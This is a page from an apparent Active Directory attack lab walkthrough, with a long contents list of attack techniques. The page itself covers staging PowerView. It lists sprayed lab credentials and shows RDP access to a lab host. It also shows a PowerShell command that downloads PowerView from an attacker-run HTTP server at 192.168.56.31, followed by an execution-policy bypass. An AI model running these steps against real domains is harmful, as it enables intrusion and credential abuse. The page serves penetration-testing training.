Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Installing xFreeRDP
  • RDP to Yonkers (192.168.56.22)
  • DownLoading PowerView.ps1 to ParrotOS Lab Machine
  • Setup HTTP Server From ParrotOS Lab Machine
  • Downloading Powerview From ParrotOS Lab Machine
  • PowerView Intro
  1. User Enumeration Exploit
  2. Powerview

Setting Up PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

We have the following credentials and by spraying the credentials and trying to authenticate to different servers and service you will see that elena.lopez has RDP access to 192.168.56.22

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1

Installing xFreeRDP

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

From there it may prompt you and tell you the dependencies are out of date, 
if it does, choose no. The second one to pop up I selected yes 
to downgrade the dependencies to the correct version.

sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
  freerdp2-x11{b} 
0 packages upgraded, 1 newly installed, 0 to remove and 228 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.9.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:

     Keep the following packages at their current version:
1)     freerdp2-x11 [Not Installed]                       



Accept this solution? [Y/n/q/?] n
The following actions will resolve these dependencies:

     Downgrade the following packages:                                                                       
1)     libfreerdp-client2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]
2)     libfreerdp2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]       
3)     libwinpr2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]         



Accept this solution? [Y/n/q/?] y
The following packages will be DOWNGRADED:
  libfreerdp-client2-2 libfreerdp2-2 libwinpr2-2 
The following NEW packages will be installed:
  freerdp2-x11 
0 packages upgraded, 1 newly installed, 3 downgraded, 0 to remove and 228 not upgraded.
Need to get 1,241 kB of archives. After unpacking 729 kB will be used.
Do you want to continue? [Y/n/?] y

RDP to Yonkers (192.168.56.22)

xfreerdp /d:north.newyork.local /u:elena.lopez /p:'princesa1' /v:192.168.56.22 /size:80%  /cert-ignore

DownLoading PowerView.ps1 to ParrotOS Lab Machine

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

Setup HTTP Server From ParrotOS Lab Machine

python3 -m http.server

Downloading Powerview From ParrotOS Lab Machine

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

PowerView Intro

Powershell -ep bypass
Import-Module .\PowerView.ps1
Get-NetUser
PreviousPowerviewNextGet-NetUser

Last updated 2 years ago